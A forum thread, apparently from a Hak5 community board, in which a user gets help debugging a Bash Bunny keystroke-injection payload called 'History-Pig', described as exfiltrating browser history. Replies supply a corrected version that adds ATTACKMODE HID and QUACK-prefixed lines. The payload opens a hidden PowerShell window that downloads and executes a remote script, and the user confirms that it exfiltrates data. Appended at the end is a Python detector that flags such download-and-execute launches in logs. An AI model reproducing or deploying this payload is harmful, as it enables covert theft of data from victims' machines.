baud (posted December 31, 2023):

Hello all,

I purchased a Bash Bunny a couple months ago and I just recently tried using it yesterday. It was working for the majority of the day and then suddenly the scripts just stopped firing on switch1 or switch2. I'm able to put it into arming mode just fine, and I know the scripts themselves work because they're directly from the github repo and they were working previously.

When I plug in the Bash Bunny, the light turns green, then turns off and nothing happens. I've performed a factory reset, the problem still persists. Please help.

[Screenshot: file structure with no SD card]

[Screenshot: file structure with SD card]

dark_pyrro (posted December 31, 2023):

> 16 minutes ago, baud said:
> then suddenly the scripts just stopped firing on switch1 or switch2

Is the "suddenly" moment linked to you starting to use a Micro SD card with the Bunny?

Judging from the screenshots, it seems as if you have tried to "duplicate" the file system structure of the internal storage to the Micro SD card. That won't work though since you always have to execute payloads stored on the internal udisk, not from the Micro SD card. They will simply not run at all.

baud (posted December 31, 2023):

> 1 minute ago, dark_pyrro said:
> Is the "suddenly" moment linked to you starting to use a Micro SD card with the Bunny?
> Judging from the screenshots, it seems as if you have tried to "duplicate" the file system structure of the internal storage to the Micro SD card. That won't work though since you always have to execute payloads stored on the internal udisk, not from the Micro SD card. They will simply not run at all.

Interesting, so you don't put anything on the SD card at all? Everything should be stored directly on the bunny?

dark_pyrro (posted December 31, 2023):

https://docs.hak5.org/bash-bunny/getting-started/considerations-for-mark-ii#storage

baud (posted December 31, 2023):

> 6 minutes ago, dark_pyrro said:
> https://docs.hak5.org/bash-bunny/getting-started/considerations-for-mark-ii#storage

I see, however it doesn't work at all even without the SD card in it. The light just turns green, then goes off and nothing happens. It was launching the scripts previously, even with the duplicated file structure.

dark_pyrro (posted December 31, 2023):

What payloads are you using in each switch position?

baud (posted December 31, 2023):

> Just now, dark_pyrro said:
> What payloads are you using in each switch position?

Currently the only one I'm using is History-Pig. If I copy/paste the powershell string into run it executes as expected, the bash bunny just never sends any keystrokes.

    REM Title: History-Pig
    REM Author: atomiczsec
    REM Description: This payload is meant to exfiltrate browsers history to a dropbox
    REM Target: Windows 10, 11
    DELAY 2000
    GUI r
    DELAY 500
    STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr 'https://redacted.site/pl.ps1'; iex $pl
    ENTER
    REM Remember to replace the link with your DropBox shared link for the intended file to download
    REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1

dark_pyrro (posted December 31, 2023):

Where's the ATTACKMODE?

baud (posted December 31, 2023):

> 12 minutes ago, dark_pyrro said:
> Where's the ATTACKMODE?

I am not sure, I am very new to duckyscript. I got this directly from github and it was executing as is before which is odd to me if it's missing something. What do I need to add? ATTACKMODE something something?

baud (posted December 31, 2023):

> 3 minutes ago, baud said:
> I am not sure, I am very new to duckyscript. I got this directly from github and it was executing as is before which is odd to me if it's missing something. What do I need to add? ATTACKMODE something something?

I see, it looks like I'd need to add ATTACKMODE HID, I'll give that a shot.

dark_pyrro (posted December 31, 2023):

It seems as if the author of the payload has forgotten to add that for some reason. Not sure why. You need to tell the Bunny what mode it should "act in". If you don't tell it to act as a keyboard (HID), it won't type anything.

So... add ATTACKMODE HID to the top of the payload file.

To my knowledge, it's only the 2nd gen Ducky that defaults to ATTACKMODE HID if nothing is specified. Never heard/seen that it's valid for the Bunny.

However, I guess you will have a bit of a challenge to get that running anyway since Dropbox has changed the way shared storage links are working and I don't think this payload has been adjusted to that fact.

baud (posted December 31, 2023):

> 5 minutes ago, dark_pyrro said:
> It seems as if the author of the payload has forgotten to add that for some reason. Not sure why. You need to tell the Bunny what mode it should "act in". If you don't tell it to act as a keyboard (HID), it won't type anything.
> So... add ATTACKMODE HID to the top of the payload file
> To my knowledge, it's only the 2nd gen Ducky that defaults to ATTACKMODE HID if nothing is specified. Never heard/seen that it's valid for the Bunny.
> However, I guess you will have a bit of a challenge to get that running anyway since Dropbox has changed the way shared storage links are working and I don't think this payload has been adjusted to that fact.

Thanks, I added the following to the top, and it's at least changing to a red LED now but I still get no output. I suspect the issue lies with the script itself, I'll play around with it for a while.

In regards to the dropbox piece, that all works fine. If I copy/paste the powershell string from the payload and manually run it in a run window, it downloads, executes and exfils as expected.

Thanks again for your help, I'll report back if anything changes.

    LED R
    ATTACKMODE HID

dark_pyrro (posted December 31, 2023, marked as Solution):

Yes, you need to QUACK things. The author is a competent user, so I'm not sure why it has been forgotten. Perhaps too quickly "converting" it from the USB Rubber Ducky to the Bunny.

dark_pyrro (posted December 31, 2023):

Something like this

    ATTACKMODE HID
    QUACK DELAY 3000
    QUACK GUI r
    QUACK DELAY 500
    QUACK STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr 'https://redacted.site/pl.ps1'; iex $pl
    QUACK ENTER

Perhaps also wrap the powershell line in quote marks and escape the dollar char as well

    QUACK STRING "powershell -w h -NoP -NonI -ep Bypass \$pl = iwr 'https://redacted.site/pl.ps1'; iex \$pl"
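
A defender-side view of the PowerShell string quoted in this thread, as an added example that is not part of any post: a small detector that flags fetch-and-execute PowerShell launches from process-creation records. The event records, field layout, indicator names and the alert rule are assumptions made for illustration.

```python
import re
# Constructed process-creation records (Sysmon Event ID 1 style fields); not real logs.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,  # string from the thread
     "CommandLine": "powershell -w h -NoP -NonI -ep Bypass "
                    "$pl = iwr 'https://redacted.site/pl.ps1'; iex $pl"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS,  # benign admin job
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,  # same idea, long-form names
     "CommandLine": 'powershell.exe -WindowStyle Hidden -Command '
                    '"Invoke-Expression (Invoke-WebRequest https://example.invalid/a.ps1)"'},
]
FETCH = re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod)\b|downloadstring")
EXEC = re.compile(r"\b(?:iex|invoke-expression)\b")

def is_flag(token, full, minlen):
    """True if token abbreviates parameter `full` with at least `minlen` letters."""
    t = token.lower()
    return t[:1] in ("-", "/") and len(t) > minlen and full.startswith(t[1:])

def indicators(event):
    toks, found = event["CommandLine"].split(), set()
    for tok, nxt in zip(toks, toks[1:] + [""]):
        val = nxt.lower().strip("'\"")
        if is_flag(tok, "windowstyle", 1) and val and ("hidden".startswith(val) or val == "1"):
            found.add("hidden_window")
        if (tok.lower() == "-ep" or is_flag(tok, "executionpolicy", 2)) and val == "bypass":
            found.add("policy_bypass")
        if is_flag(tok, "noprofile", 3):
            found.add("no_profile")
        if is_flag(tok, "noninteractive", 4):
            found.add("non_interactive")
    cmd = event["CommandLine"].lower()
    if FETCH.search(cmd) and EXEC.search(cmd):
        found.add("download_cradle")
    if event["ParentImage"].lower().endswith("\\explorer.exe"):
        found.add("explorer_parent")  # weak signal: Run dialog, but also any Start-menu launch
    return found

def is_alert(event):
    """Alert on fetch-and-execute combined with a hidden window or a policy bypass."""
    ind = indicators(event)
    return "download_cradle" in ind and bool(ind & {"hidden_window", "policy_bypass"})

if __name__ == "__main__":
    print([(is_alert(e), sorted(indicators(e))) for e in SAMPLE_EVENTS])
```

The scheduled-job record shows why `-ep Bypass` alone is not alerted on: the rule requires the download-and-execute pair as well.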

baud (posted December 31, 2023):

> 6 minutes ago, dark_pyrro said:
> Yes, you need to QUACK things. The author is a competent user, so I'm not sure why it has been forgotten. Perhaps too quickly "converting" it from the USB Rubber Ducky to the Bunny.

You are the man, thanks so much. This gives me a much better understanding overall on how to use it.

dark_pyrro (posted December 31, 2023):

There's always the official documentation. I'd suggest reading all of it.

https://docs.hak5.org/bash-bunny/

baud (posted December 31, 2023):

> 46 minutes ago, dark_pyrro said:
> There's always the official documentation. I'd suggest reading all of it.
> https://docs.hak5.org/bash-bunny/

Admittedly, yes I should "RTFM" however I figured I'd be safe with scripts from the official repo. Thanks again for all your help, if they aren't paying you they should be.